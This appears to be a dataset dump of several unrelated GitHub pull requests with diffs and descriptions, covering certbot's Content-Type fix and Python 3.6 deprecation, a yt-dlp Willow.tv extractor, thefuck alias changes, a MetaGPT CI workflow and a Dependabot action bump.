- [ ] Added new notebook (that tests end-to-end)
- [x] I stared at the code and made sure it makes sense
# Suggested Checklist:
- [ ] I have performed a self-review of my own code
- [ ] I have commented my code, particularly in hard-to-understand areas
- [ ] I have made corresponding changes to the documentation
- [ ] My changes generate no new warnings
- [ ] I have added tests that prove my fix is effective or that my feature works
- [ ] New and existing unit tests pass locally with my changes
| https://api.github.com/repos/run-llama/llama_index/pulls/7839 | 2023-09-26T22:23:26Z | 2023-09-26T22:53:19Z | 2023-09-26T22:53:19Z | 2023-09-26T22:53:19Z | 322 | run-llama/llama_index | 6,842 |
Use correct Content-Types in headers. | diff --git a/acme/acme/client.py b/acme/acme/client.py
index de7eef2992b..6a648bb9209 100644
--- a/acme/acme/client.py
+++ b/acme/acme/client.py
@@ -495,6 +495,7 @@ def revoke(self, cert):
class ClientNetwork(object): # pylint: disable=too-many-instance-attributes
"""Client network."""
JSON_CONTENT_TYPE = 'application/json'
+ JOSE_CONTENT_TYPE = 'application/jose+json'
JSON_ERROR_CONTENT_TYPE = 'application/problem+json'
REPLAY_NONCE_HEADER = 'Replay-Nonce'
@@ -641,9 +642,10 @@ def _get_nonce(self, url):
self._add_nonce(self.head(url))
return self._nonces.pop()
- def post(self, url, obj, content_type=JSON_CONTENT_TYPE, **kwargs):
+ def post(self, url, obj, content_type=JOSE_CONTENT_TYPE, **kwargs):
"""POST object wrapped in `.JWS` and check response."""
data = self._wrap_in_jws(obj, self._get_nonce(url))
+ kwargs.setdefault('headers', {'Content-Type': content_type})
response = self._send_request('POST', url, data=data, **kwargs)
self._add_nonce(response)
return self._check_response(response, content_type=content_type)
diff --git a/acme/acme/client_test.py b/acme/acme/client_test.py
index 585576e2d0e..374f8954c47 100644
--- a/acme/acme/client_test.py
+++ b/acme/acme/client_test.py
@@ -630,6 +630,10 @@ def test_get(self):
self.send_request.assert_called_once_with(
'GET', 'http://example.com/', bar='baz')
+ def test_post_no_content_type(self):
+ self.content_type = self.net.JOSE_CONTENT_TYPE
+ self.assertEqual(self.checked_response, self.net.post('uri', self.obj))
+
def test_post(self):
# pylint: disable=protected-access
self.assertEqual(self.checked_response, self.net.post(
| This closes https://github.com/certbot/certbot/issues/3555
The content type for all POST requests is now `application/jose+json`, which is in compliance with the latest ACME spec. https://tools.ietf.org/html/draft-ietf-acme-acme-03
| https://api.github.com/repos/certbot/certbot/pulls/3566 | 2016-09-30T05:02:28Z | 2016-10-05T19:28:38Z | 2016-10-05T19:28:38Z | 2016-12-08T01:14:36Z | 470 | certbot/certbot | 2,894 |
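One design note on the new header line: `dict.setdefault` only fires when the caller passed no `headers` at all, so a caller-supplied dict wins wholesale. A hypothetical reduction of the pattern:

```python
JOSE_CONTENT_TYPE = "application/jose+json"

def post_headers(content_type=JOSE_CONTENT_TYPE, **kwargs):
    # Mirrors `kwargs.setdefault('headers', {...})` from the diff.
    kwargs.setdefault("headers", {"Content-Type": content_type})
    return kwargs["headers"]

default = post_headers()
custom = post_headers(headers={"Accept": "application/json"})
# `custom` carries no Content-Type: the supplied dict is used as-is.
```

If merging rather than replacing were wanted, the Content-Type would have to be inserted into the supplied dict instead of relying on `setdefault` at the top level.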
[willow] new extractor | diff --git a/yt_dlp/extractor/extractors.py b/yt_dlp/extractor/extractors.py
index 4f9de71e27d..a6f1acb5654 100644
--- a/yt_dlp/extractor/extractors.py
+++ b/yt_dlp/extractor/extractors.py
@@ -1782,6 +1782,7 @@
WeiboMobileIE
)
from .weiqitv import WeiqiTVIE
+from .willow import WillowIE
from .wimtv import WimTVIE
from .whowatch import WhoWatchIE
from .wistia import (
diff --git a/yt_dlp/extractor/willow.py b/yt_dlp/extractor/willow.py
new file mode 100644
index 00000000000..4d3d62f9556
--- /dev/null
+++ b/yt_dlp/extractor/willow.py
@@ -0,0 +1,58 @@
+# coding: utf-8
+from ..utils import ExtractorError
+from .common import InfoExtractor
+
+
+class WillowIE(InfoExtractor):
+ _VALID_URL = r'https?://(www\.)?willow\.tv/videos/(?P<id>[0-9a-z-_]+)'
+ _GEO_COUNTRIES = ['US']
+
+ _TESTS = [{
+ 'url': 'http://willow.tv/videos/d5winning-moment-eng-vs-ind-streaming-online-4th-test-india-tour-of-england-2021',
+ 'info_dict': {
+ 'id': '169662',
+ 'display_id': 'd5winning-moment-eng-vs-ind-streaming-online-4th-test-india-tour-of-england-2021',
+ 'ext': 'mp4',
+ 'title': 'Winning Moment: 4th Test, England vs India',
+ 'thumbnail': 'https://aimages.willow.tv/ytThumbnails/6748_D5winning_moment.jpg',
+ 'duration': 233,
+ 'timestamp': 1630947954,
+ 'upload_date': '20210906',
+ 'location': 'Kennington Oval, London',
+ 'series': 'India tour of England 2021',
+ },
+ 'params': {
+ 'skip_download': True, # AES-encrypted m3u8
+ },
+ }, {
+ 'url': 'http://willow.tv/videos/highlights-short-ind-vs-nz-streaming-online-2nd-t20i-new-zealand-tour-of-india-2021',
+ 'only_matching': True,
+ }]
+
+ def _real_extract(self, url):
+ video_id = self._match_id(url)
+ webpage = self._download_webpage(url, video_id)
+ video_data = self._parse_json(self._html_search_regex(
+ r'var\s+data_js\s*=\s*JSON\.parse\(\'(.+)\'\)', webpage,
+ 'data_js'), video_id)
+
+ video = next((v for v in video_data.get('trending_videos') or []
+ if v.get('secureurl')), None)
+ if not video:
+ raise ExtractorError('No videos found')
+
+ formats = self._extract_m3u8_formats(video['secureurl'], video_id, 'mp4')
+ self._sort_formats(formats)
+
+ return {
+ 'id': str(video.get('content_id')),
+ 'display_id': video.get('video_slug'),
+ 'title': video.get('video_name') or self._html_search_meta('twitter:title', webpage),
+ 'formats': formats,
+ 'thumbnail': video.get('yt_thumb_url') or self._html_search_meta(
+ 'twitter:image', webpage, default=None),
+ 'duration': video.get('duration_seconds'),
+ 'timestamp': video.get('created_date'),
+ 'location': video.get('venue'),
+ 'series': video.get('series_name'),
+ }
| ## Please follow the guide below
- You will be asked some questions, please read them **carefully** and answer honestly
- Put an `x` into all the boxes [ ] relevant to your *pull request* (like that [x])
- Use *Preview* tab to see how your *pull request* will actually look like
---
### Before submitting a *pull request* make sure you have:
- [x] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions)
- [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8)
### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:
- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [ ] Bug fix
- [ ] Improvement
- [x] New extractor
- [ ] New feature
---
### Description of your *pull request* and other information
Extractor for willow.tv, which has both free and subscriber-only content. Only support for free videos was added as I am not a paid subscriber. | https://api.github.com/repos/yt-dlp/yt-dlp/pulls/1723 | 2021-11-19T21:51:55Z | 2021-11-20T04:03:43Z | 2021-11-20T04:03:43Z | 2021-11-20T04:03:43Z | 904 | yt-dlp/yt-dlp | 7,603 |
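The `next((v for v in ...), None)` line in `_real_extract` is the standard first-match-or-default idiom; isolated here with made-up sample data:

```python
videos = [
    {"video_slug": "teaser"},   # no playable stream
    {"video_slug": "highlights", "secureurl": "https://example.invalid/a.m3u8"},
]

video = next((v for v in videos if v.get("secureurl")), None)   # first hit
nothing = next((v for v in [] if v.get("secureurl")), None)     # fallback
```

Returning `None` instead of letting `StopIteration` escape is what lets the extractor turn an empty result into its own `ExtractorError('No videos found')`.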
#433: Set env vars right in the aliases | diff --git a/tests/test_shells.py b/tests/test_shells.py
index 060419f49..1cea2fb98 100644
--- a/tests/test_shells.py
+++ b/tests/test_shells.py
@@ -50,8 +50,8 @@ def test_app_alias(self, shell):
assert 'alias fuck' in shell.app_alias('fuck')
assert 'alias FUCK' in shell.app_alias('FUCK')
assert 'thefuck' in shell.app_alias('fuck')
- assert 'TF_ALIAS' in shell.app_alias('fuck')
- assert 'PYTHONIOENCODING=utf-8' in shell.app_alias('fuck')
+ assert 'TF_ALIAS=fuck PYTHONIOENCODING' in shell.app_alias('fuck')
+ assert 'PYTHONIOENCODING=utf-8 thefuck' in shell.app_alias('fuck')
def test_get_history(self, history_lines, shell):
history_lines(['ls', 'rm'])
@@ -112,8 +112,8 @@ def test_app_alias(self, shell):
assert 'alias fuck' in shell.app_alias('fuck')
assert 'alias FUCK' in shell.app_alias('FUCK')
assert 'thefuck' in shell.app_alias('fuck')
- assert 'TF_ALIAS' in shell.app_alias('fuck')
- assert 'PYTHONIOENCODING=utf-8' in shell.app_alias('fuck')
+ assert 'TF_ALIAS=fuck PYTHONIOENCODING' in shell.app_alias('fuck')
+ assert 'PYTHONIOENCODING=utf-8 thefuck' in shell.app_alias('fuck')
def test_get_history(self, history_lines, shell):
history_lines(['ls', 'rm'])
@@ -193,8 +193,8 @@ def test_app_alias(self, shell):
assert 'function fuck' in shell.app_alias('fuck')
assert 'function FUCK' in shell.app_alias('FUCK')
assert 'thefuck' in shell.app_alias('fuck')
- assert 'TF_ALIAS' in shell.app_alias('fuck')
- assert 'PYTHONIOENCODING=utf-8' in shell.app_alias('fuck')
+ assert 'TF_ALIAS=fuck PYTHONIOENCODING' in shell.app_alias('fuck')
+ assert 'PYTHONIOENCODING=utf-8 thefuck' in shell.app_alias('fuck')
def test_get_history(self, history_lines, shell):
history_lines(['- cmd: ls', ' when: 1432613911',
@@ -252,8 +252,8 @@ def test_app_alias(self, shell):
assert 'alias fuck' in shell.app_alias('fuck')
assert 'alias FUCK' in shell.app_alias('FUCK')
assert 'thefuck' in shell.app_alias('fuck')
- assert 'TF_ALIAS' in shell.app_alias('fuck')
- assert 'PYTHONIOENCODING=utf-8' in shell.app_alias('fuck')
+ assert 'TF_ALIAS=fuck PYTHONIOENCODING' in shell.app_alias('fuck')
+ assert 'PYTHONIOENCODING=utf-8 thefuck' in shell.app_alias('fuck')
def test_get_history(self, history_lines, shell):
history_lines([': 1432613911:0;ls', ': 1432613916:0;rm'])
diff --git a/thefuck/shells.py b/thefuck/shells.py
index f78d25755..9bd7fd3a3 100644
--- a/thefuck/shells.py
+++ b/thefuck/shells.py
@@ -38,8 +38,8 @@ def to_shell(self, command_script):
return command_script
def app_alias(self, fuck):
- return "alias {0}='TF_ALIAS={0} PYTHONIOENCODING=utf-8 " \
- "eval $(thefuck $(fc -ln -1))'".format(fuck)
+ return "alias {0}='eval $(TF_ALIAS={0} PYTHONIOENCODING=utf-8 " \
+ "thefuck $(fc -ln -1))'".format(fuck)
def _get_history_file_name(self):
return ''
@@ -103,8 +103,8 @@ def _script_from_history(self, line):
class Bash(Generic):
def app_alias(self, fuck):
- return "TF_ALIAS={0} alias {0}='PYTHONIOENCODING=utf-8 " \
- "eval $(thefuck $(fc -ln -1));" \
+ return "alias {0}='eval " \
+ "$(TF_ALIAS={0} PYTHONIOENCODING=utf-8 thefuck $(fc -ln -1));" \
" history -r'".format(fuck)
def _parse_alias(self, alias):
@@ -152,7 +152,7 @@ def app_alias(self, fuck):
' set -l exit_code $status\n'
' set -l fucked_up_command $history[1]\n'
' env TF_ALIAS={0} PYTHONIOENCODING=utf-8'
- ' thefuck $fucked_up_command | read -l unfucked_command\n'
+ ' thefuck $fucked_up_command | read -l unfucked_command\n'
' if [ "$unfucked_command" != "" ]\n'
' eval $unfucked_command\n'
' if test $exit_code -ne 0\n'
@@ -203,9 +203,8 @@ def how_to_configure(self):
class Zsh(Generic):
def app_alias(self, fuck):
- return "TF_ALIAS={0}" \
- " alias {0}='PYTHONIOENCODING=utf-8 " \
- "eval $(thefuck $(fc -ln -1 | tail -n 1));" \
+ return "alias {0}='eval $(TF_ALIAS={0} PYTHONIOENCODING=utf-8" \
+ " thefuck $(fc -ln -1 | tail -n 1));" \
" fc -R'".format(fuck)
def _parse_alias(self, alias):
diff --git a/thefuck/types.py b/thefuck/types.py
index 89c9d862f..f58646588 100644
--- a/thefuck/types.py
+++ b/thefuck/types.py
@@ -281,4 +281,6 @@ def run(self, old_cmd):
if settings.alter_history:
shells.put_to_history(self.script)
# This depends on correct setting of PYTHONIOENCODING by the alias:
+ logs.debug(u'PYTHONIOENCODING: {}'.format(
+ os.environ.get('PYTHONIOENCODING', '>-not-set-<')))
print(self.script)
| Fix #433
| https://api.github.com/repos/nvbn/thefuck/pulls/434 | 2016-01-16T23:41:44Z | 2016-01-17T11:00:23Z | 2016-01-17T11:00:23Z | 2016-01-17T16:47:58Z | 1,460 | nvbn/thefuck | 30,838 |
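The substance of the fix is POSIX scoping: `VAR=value cmd` exports the variable only into that one command's environment, so the assignments have to prefix the `thefuck` invocation inside `$(…)` rather than sit in front of `alias` or `eval`. Demonstrated from Python (assumes a POSIX `sh` on `PATH`):

```python
import os
import subprocess

# Drop any pre-existing TF_ALIAS so the demonstration is deterministic.
env = {k: v for k, v in os.environ.items() if k != "TF_ALIAS"}
script = "TF_ALIAS=fuck sh -c 'echo inner=$TF_ALIAS'; echo outer=$TF_ALIAS"
out = subprocess.run(["sh", "-c", script], env=env,
                     capture_output=True, text=True).stdout
# The child process sees the variable, the shell afterwards does not:
#   inner=fuck
#   outer=
```

This is exactly why the old `TF_ALIAS={0} alias {0}=...` form failed: the assignment applied to the `alias` builtin at definition time, not to the `thefuck` process the alias later runs.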
feat: add github actions unittest | diff --git a/.github/workflows/unittest.yaml b/.github/workflows/unittest.yaml
new file mode 100644
index 000000000..565cdaead
--- /dev/null
+++ b/.github/workflows/unittest.yaml
@@ -0,0 +1,42 @@
+name: Python application test
+
+on:
+ workflow_dispatch:
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ strategy:
+ matrix:
+ # python-version: ['3.9', '3.10', '3.11']
+ python-version: ['3.9']
+
+ steps:
+ - uses: actions/checkout@v4
+ - name: Set up Python ${{ matrix.python-version }}
+ uses: actions/setup-python@v4
+ with:
+ python-version: ${{ matrix.python-version }}
+ - name: Install dependencies
+ run: |
+ python -m pip install --upgrade pip
+ pip install -e.
+ npm install -g @mermaid-js/mermaid-cli
+ playwright install --with-deps chromium
+ - name: Test with pytest
+ run: |
+ pip install pytest pytest-asyncio pytest-cov pytest-html
+ export OPENAI_API_KEY="${{ secrets.OPENAI_API_KEY }}" OPENAI_API_MODEL="gpt-3.5-turbo-1106"
+ export PYPPETEER_EXECUTABLE_PATH="/usr/bin/chromium"
+ pytest tests/ --doctest-modules --junitxml=junit/test-results-${{ matrix.python-version }}.xml --cov=./metagpt/ --cov-report=xml:cov.xml --cov-report=html:htmlcov
+ coverage report -m
+ - name: Upload pytest test results
+ uses: actions/upload-artifact@v3
+ with:
+ name: pytest-results-${{ matrix.python-version }}
+ path: |
+ ./junit/test-results-${{ matrix.python-version }}.xml
+ ./htmlcov/
+ retention-days: 3
+ if: ${{ always() }}
+
\ No newline at end of file
| **Features**
Add a GitHub Actions unit test workflow.
Example: https://github.com/voidking/MetaGPT/actions/runs/7353165983
**Result**


| https://api.github.com/repos/geekan/MetaGPT/pulls/650 | 2023-12-29T02:35:44Z | 2023-12-29T03:08:52Z | 2023-12-29T03:08:52Z | 2023-12-29T03:08:52Z | 477 | geekan/MetaGPT | 16,531 |
Deprecate Python 3.6 support | diff --git a/acme/acme/__init__.py b/acme/acme/__init__.py
index 8b6ce88c09d..b4cbf5e4533 100644
--- a/acme/acme/__init__.py
+++ b/acme/acme/__init__.py
@@ -6,6 +6,7 @@
"""
import sys
+import warnings
# This code exists to keep backwards compatibility with people using acme.jose
# before it became the standalone josepy package.
@@ -19,3 +20,11 @@
# preserved (acme.jose.* is josepy.*)
if mod == 'josepy' or mod.startswith('josepy.'):
sys.modules['acme.' + mod.replace('josepy', 'jose', 1)] = sys.modules[mod]
+
+
+if sys.version_info[:2] == (3, 6):
+ warnings.warn(
+ "Python 3.6 support will be dropped in the next release of "
+ "acme. Please upgrade your Python version.",
+ PendingDeprecationWarning,
+ ) # pragma: no cover
diff --git a/certbot/CHANGELOG.md b/certbot/CHANGELOG.md
index b43154db782..1ac183409a1 100644
--- a/certbot/CHANGELOG.md
+++ b/certbot/CHANGELOG.md
@@ -9,6 +9,8 @@ Certbot adheres to [Semantic Versioning](https://semver.org/).
* Added `show_account` subcommand, which will fetch the account information
from the ACME server and show the account details (account URL and, if
applicable, email address or addresses)
+* We deprecated support for Python 3.6 in Certbot and its ACME library.
+ Support for Python 3.6 will be removed in the next major release of Certbot.
### Changed
diff --git a/certbot/certbot/__init__.py b/certbot/certbot/__init__.py
index 3f9e235bd0c..fe0a2a4169b 100644
--- a/certbot/certbot/__init__.py
+++ b/certbot/certbot/__init__.py
@@ -1,3 +1,13 @@
"""Certbot client."""
# version number like 1.2.3a0, must have at least 2 parts, like 1.2
+import sys
+import warnings
+
__version__ = '1.23.0.dev0'
+
+if sys.version_info[:2] == (3, 6):
+ warnings.warn(
+ "Python 3.6 support will be dropped in the next release of "
+ "certbot. Please upgrade your Python version.",
+ PendingDeprecationWarning,
+ ) # pragma: no cover
diff --git a/certbot/certbot/_internal/main.py b/certbot/certbot/_internal/main.py
index 15a7239f61d..f4062efaae4 100644
--- a/certbot/certbot/_internal/main.py
+++ b/certbot/certbot/_internal/main.py
@@ -1673,6 +1673,10 @@ def main(cli_args: List[str] = None) -> Optional[Union[str, int]]:
zope.component.provideUtility(report, interfaces.IReporter)
util.atexit_register(report.print_messages)
+ if sys.version_info[:2] == (3, 6):
+ logger.warning("Python 3.6 support will be dropped in the next release "
+ "of Certbot - please upgrade your Python version.")
+
with make_displayer(config) as displayer:
display_obj.set_display(displayer)
diff --git a/pytest.ini b/pytest.ini
index 92a403451e2..ea15938082c 100644
--- a/pytest.ini
+++ b/pytest.ini
@@ -27,6 +27,8 @@
# 7) botocore's default TLS settings raise deprecation warnings in Python
# 3.10+, but their values are sane from a security perspective. See
# https://github.com/boto/botocore/issues/2550.
+# 8) Ignore our own PendingDeprecationWarning about Python 3.6 soon to be dropped.
+# See https://github.com/certbot/certbot/pull/9160.
filterwarnings =
error
ignore:The external mock module:PendingDeprecationWarning
@@ -36,3 +38,4 @@ filterwarnings =
ignore:decodestring\(\) is a deprecated alias:DeprecationWarning:dns
ignore:_SixMetaPathImporter.:ImportWarning
ignore:ssl.PROTOCOL_TLS:DeprecationWarning:botocore
+ ignore:Python 3.6 support will be dropped:PendingDeprecationWarning
| Fixes https://github.com/certbot/certbot/issues/8983
Python 3.6 is now EOL: https://endoflife.date/python
This is normally a good time to add warnings about the Python 3.6 deprecation in the upcoming Certbot release 1.23.0 so that its support can be removed in 1.24.0.
We have to say here that EPEL maintainers asked us to keep maintaining support for Python 3.6 because Python 3.7 will never be shipped to CentOS 7. This support would in theory be needed for up to 2 more years, basically until CentOS 7's EOL on 2024-06-30. It has been said that we could keep this support on a best-effort basis until a reasonable need on Certbot's side requires dropping Python 3.6. See https://github.com/certbot/certbot/issues/8983 for more information.
However, some of us (including me) consider that there is already a reasonable need right now. Indeed, keeping support for Python 3.6 while the Python community globally moves away from it will implicitly pin some Certbot dependencies to the last version that still supports Python 3.6, as their upstream maintainers decide to make the move. At any point in the future, one of these dependencies could require an urgent upgrade (typically for a critical uncovered vulnerability): we would then have to drop Python 3.6 immediately, without further notice, instead of following an organized deprecation path.
This reason motivates proactively deprecating and then dropping Python versions once they are EOL. You can see the discussion in Mattermost starting from [this post](https://opensource.eff.org/eff-open-source/pl/ntzs9zy1fprjmkso3xrqspnoce) for more context on the reasoning.
| https://api.github.com/repos/certbot/certbot/pulls/9160 | 2022-01-06T21:03:28Z | 2022-01-21T20:42:05Z | 2022-01-21T20:42:05Z | 2022-01-22T16:35:45Z | 1,077 | certbot/certbot | 163 |
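The version-gated deprecation warning this PR adds can be sketched standalone. This follows the shape of the diff above; the function name and parameter are mine, not from Certbot:

```python
import sys
import warnings

def warn_if_python_36(package):
    # Warn only when running on the exact version slated for removal,
    # matching sys.version_info[:2] as the diff does.
    if sys.version_info[:2] == (3, 6):
        warnings.warn(
            "Python 3.6 support will be dropped in the next release of "
            "{}. Please upgrade your Python version.".format(package),
            PendingDeprecationWarning,
        )

warn_if_python_36("certbot")
```

Using `PendingDeprecationWarning` (rather than `DeprecationWarning`) signals the drop is planned for a future release, and keeps the warning silent by default for end users while remaining visible to developers who enable warnings.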
Bump peter-evans/find-comment from 2.4.0 to 3.0.0 | diff --git a/.github/workflows/diff_shades_comment.yml b/.github/workflows/diff_shades_comment.yml
index 9b3b4b579da..206fcfdaf48 100644
--- a/.github/workflows/diff_shades_comment.yml
+++ b/.github/workflows/diff_shades_comment.yml
@@ -33,7 +33,7 @@ jobs:
- name: Try to find pre-existing PR comment
if: steps.metadata.outputs.needs-comment == 'true'
id: find-comment
- uses: peter-evans/find-comment@a54c31d7fa095754bfef525c0c8e5e5674c4b4b1
+ uses: peter-evans/find-comment@d5fe37641ad8451bdd80312415672ba26c86575e
with:
issue-number: ${{ steps.metadata.outputs.pr-number }}
comment-author: "github-actions[bot]"
| Bumps [peter-evans/find-comment](https://github.com/peter-evans/find-comment) from 2.4.0 to 3.0.0.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a href="https://github.com/peter-evans/find-comment/releases">peter-evans/find-comment's releases</a>.</em></p>
<blockquote>
<h2>Find Comment v3.0.0</h2>
<p>⚙️ Updated runtime to Node.js 20</p>
<ul>
<li>The action now requires a minimum version of <a href="https://github.com/actions/runner/releases/tag/v2.308.0">v2.308.0</a> for the Actions runner. Update self-hosted runners to v2.308.0 or later to ensure compatibility.</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>build(deps-dev): bump prettier from 2.8.7 to 2.8.8 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/173">peter-evans/find-comment#173</a></li>
<li>build(deps-dev): bump <code>@types/node</code> from 18.15.13 to 18.16.3 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/175">peter-evans/find-comment#175</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.0 to 5.59.1 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/176">peter-evans/find-comment#176</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.0 to 5.59.1 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/174">peter-evans/find-comment#174</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.1 to 5.59.2 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/177">peter-evans/find-comment#177</a></li>
<li>build(deps-dev): bump eslint from 8.39.0 to 8.40.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/179">peter-evans/find-comment#179</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.1 to 5.59.2 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/178">peter-evans/find-comment#178</a></li>
<li>build(deps-dev): bump <code>@types/node</code> from 18.16.3 to 18.16.5 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/180">peter-evans/find-comment#180</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.2 to 5.59.5 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/181">peter-evans/find-comment#181</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.2 to 5.59.5 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/183">peter-evans/find-comment#183</a></li>
<li>build(deps-dev): bump <code>@types/node</code> from 18.16.5 to 18.16.9 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/182">peter-evans/find-comment#182</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.5 to 5.59.6 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/184">peter-evans/find-comment#184</a></li>
<li>build(deps-dev): bump eslint from 8.40.0 to 8.41.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/186">peter-evans/find-comment#186</a></li>
<li>build(deps-dev): bump <code>@types/node</code> from 18.16.9 to 18.16.13 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/187">peter-evans/find-comment#187</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.5 to 5.59.6 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/185">peter-evans/find-comment#185</a></li>
<li>build(deps-dev): bump <code>@types/node</code> from 18.16.13 to 18.16.16 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/188">peter-evans/find-comment#188</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.6 to 5.59.7 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/190">peter-evans/find-comment#190</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.6 to 5.59.7 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/189">peter-evans/find-comment#189</a></li>
<li>build(deps-dev): bump eslint from 8.41.0 to 8.42.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/191">peter-evans/find-comment#191</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.7 to 5.59.8 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/193">peter-evans/find-comment#193</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.7 to 5.59.8 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/194">peter-evans/find-comment#194</a></li>
<li>build(deps-dev): bump eslint-plugin-github from 4.7.0 to 4.8.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/192">peter-evans/find-comment#192</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.8 to 5.59.9 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/195">peter-evans/find-comment#195</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.8 to 5.59.9 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/197">peter-evans/find-comment#197</a></li>
<li>build(deps-dev): bump <code>@types/node</code> from 18.16.16 to 18.16.17 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/196">peter-evans/find-comment#196</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.9 to 5.59.11 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/198">peter-evans/find-comment#198</a></li>
<li>build(deps-dev): bump eslint from 8.42.0 to 8.43.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/199">peter-evans/find-comment#199</a></li>
<li>build(deps-dev): bump <code>@types/node</code> from 18.16.17 to 18.16.18 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/200">peter-evans/find-comment#200</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.9 to 5.59.11 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/201">peter-evans/find-comment#201</a></li>
<li>build(deps-dev): bump eslint-plugin-jest from 27.2.1 to 27.2.2 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/202">peter-evans/find-comment#202</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/eslint-plugin</code> from 5.59.11 to 5.60.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/203">peter-evans/find-comment#203</a></li>
<li>build(deps-dev): bump <code>@typescript-eslint/parser</code> from 5.59.11 to 5.60.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/204">peter-evans/find-comment#204</a></li>
<li>build(deps-dev): bump <code>@types/node</code> from 18.16.18 to 18.16.19 by <a href="https://github.com/dependabot"><code>@dependabot</code></a> in <a href="https://redirect.github.com/peter-evans/find-comment/pull/205">peter-evans/find-comment#205</a></li>
